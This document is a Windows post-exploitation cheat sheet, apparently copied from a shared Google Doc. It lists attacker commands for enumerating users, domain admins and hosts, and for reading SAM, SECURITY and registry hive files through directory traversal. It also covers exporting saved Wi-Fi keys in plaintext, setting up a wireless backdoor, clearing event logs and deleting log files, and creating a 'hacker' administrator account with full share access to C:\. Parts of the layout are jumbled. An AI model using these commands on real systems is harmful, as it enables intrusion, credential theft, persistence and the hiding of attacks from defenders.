Windows Post-Exploitation Command List
Windows Post-Exploitation Command List
Command Execution
If for any you cannot access/edit these files in the future, please contact
[email protected]
You can download these files in any format using Google Doc’s
File->Download As method
If you are viewing this on anything other than Google Docs then you can get
access to the latest links to the Linux/Unix/BSD, OS X, Obscure, Metasploit, and
Windows here: http://bit.ly/nuc0N0/
DISCLAIMER: Anyone can edit these docs, and all that entails and implies
Blind Files
(Things to pull when all you can do is to blindly read) LFI/Directory traversal(s) or remote file share
instances like SMB/FTP/NFS or otherwise.. Files that will have the same name across networks /
Windows domains / systems.
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\Reg
Back\system
%SYSTEMDRIVE%\autoexec.bat
>insert new rows above this line< SEE IMPORTANT FILES SECTION FOR MORE IDEAS
System
whoami Lists your current user. Not present in all versions of Windows; however
shall be present in Windows NT 6.0-6.1.
whoami /all Lists current user, sid, groups current user is a member of and their
sids as well as current privilege level.
fsutil fsinfo drives Must be an administrator to run this, but it lists the current drives on the
system.
reg query HKLM /s /d /f "C:\* securely registered executables within the system registry on Windows
*.exe" | find /I "C:\" | find /V """" 7.
netstat -nabo Lists ports / connections with corresponding process (-b), don’t
perform looking (-n), all connections (-a) and owning process ID (-o)
netstat -na | findstr :445 Find all listening ports and connections on port 445
netstat -nao | findstr Find all LISTENING ports and their associated PIDs
LISTENING
netstat -anob | findstr “services, The “b” flag makes the command take longer but will output the
process or port” process name using each of the connections.
netsh diag show all {XP only} Shows information on network services and adapters
net view Queries NBNS/SMB (SAMBA) and tries to find all hosts in your
current workgroup or domain.
net view /domain:otherdomain Queries NBNS/SMB (SAMBA) and tries to find all hosts in the
‘otherdomain’
net user %USERNAME% Pulls information on the current user, if they are a domain user. If
/domain you are a local user then you just drop the /domain. Important things
to note are login times, last time changed password, logon scripts,
and group membership
net accounts /domain Prints the password policy for the domain
net localgroup administrators Prints the members of the Administrators local group
net localgroup administrators as this was supposed to use localgroup & domain, this actually
/domain another way of getting *current* domain admins
net group “Domain Admins” Prints the members of the Domain Admins group
/domain
net group “Enterprise Admins” Prints the members of the Enterprise Admins group
/domain
net group “Domain Controllers” Prints the list of Domain Controllers for the current domain
/domain
net share Displays your currently shared SMB entries, and what path(s) they
point to
arp -a Lists all the systems currently in the machine’s ARP table.
route print Prints the machine’s routing table. This can be good for
finding other networks and static routes that have been put in
place
netsh wlan show profiles shows all saved wireless profiles. You may then export the
info for those profiles with the command below
netsh wlan export profile exports a user wifi profile with the password in plaintext to an
folder=. key=clear xml file in the current working directory
netsh wlan set hostednetwork Complete hosted network setup for creating a wireless
ssid=<ssid> key=<passphrase> backdoor on win 7
keyUsage=persistent|temporary
wmic ntdomain list Retrieve information about Domain and Domain Controller
Configs
tree C:\ /f /a > Prints a directory listing in ‘tree’ format. The /a makes the tree printed
C:\output_of_tree.txt with ASCII characters instead of special ones and the /f displays file
names as well as folders
dir /a Lists all files in a directory to include hidden and system files
dir /b /s [Directory or Lists files and directories to include sub-directories (/s) in ‘base’
Filename] format (/b)
dir \ /s /b | find /I Searches the output of dir from the root of the drive current drive (\)
“searchstring” and all sub drectories (/s) using the ‘base’ format (/b) so that it outputs
the full path for each listing, for ‘searchstring’ anywhere in the file
command | find /c /v “” Counts the lines of whatever you use for ‘command’
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software
%WINDIR%\repair\security
%WINDIR%\iis6.log (5, 6 or 7)
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts
tasklist /V /S computername
qwinsta /SERVER:computername
qprocess /SERVER:computername *
net use \\computername This maps IPC$ which does not show up as a drive but
allows you to access the remote system as the current
user. This is less helpful as most commands will
automatically make this connection if needed
net use \\computername Using the IPC$ mount use a user name and password
/user:DOMAIN\username password allows you to access commands that do not usually ask
for a username and password as a different user in the
context of the remote system.
Auto-Start Directories
● ver (Returns kernel version - like uname on *nix)
Persistance
This section focuses on gaining a foothold to re-gain, or re-obtain access to a system through means of
authentication, backdoors, etc..
Binary Planting
Check the $PATH environmental variable Some directories may be writable. See:
https://www.htbridge.com/advisory/HTB23108
WMI
● wmic bios
● wmic qfe qfe get hotfixid
● (This gets patches IDs)
● wmic startupwmic service
● wmic process get caption,executablepath,commandline
● wmic process call create “process_name” (executes a program)
● wmic process where name=”process_name” call terminate (terminates program)
● wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size,
volumeserialnumber (hard drive information)
● wmic useraccount (usernames, sid, and various security related goodies)
● wmic useraccount get /ALL
● wmic share get /ALL (you can use ? for gets help ! )
● wmic startup list full (this can be a huge list!!!)
● wmic /node:"hostname" bios get serialnumber (this can be great for finding warranty info
about target)
Deleting Logs
● wevtutil el (list logs)
● wevtutil cl <LogName> (Clear specific lowbadming)
Windows Post Exploitation Command List - Page: 10
● del %WINDIR%\*.log /a /s /q /f
Vista/7
● winstat features
● wbadmin get status
● wbadmin get items
● gpresult /H gpols.htm
● bcdedit /export <filename>
Command Description
net user hacker hacker Creates a new local (to the victim) user called ‘hacker’ with
/add the password of ‘hacker’
net localgroup Adds the new user ‘hacker’ to the local administrators group
administrators /add
hacker
or
net localgroup
administrators hacker
/add
net share nothing$=C:\ Shares the C drive (you can specify any drive) out as a
/grant:hacker,FULL Windows share and grants the user ‘hacker’ full rights to
/unlimited access, or modify anything on that drive.
net user username Changes an inactive / disabled account to active. This can
/active:yes /domain useful for re-enabling old domain admins to use, but still puts
up a red flag if those accounts are being watched.
netsh firewall set Enables the local windows firewall. If rules are not in place
opmode enable for your connection, this could cause you to loose it.
REMEMBER: DO NOT RUN BINARIES YOU HAVEN’T VETTED - BINARIES BELOW ARE
NOT BEING VOUCHED FOR IN ANY WAY AS THIS DOCUMENT CAN BE EDITED BY
ANYONE
No registration or
authentication required.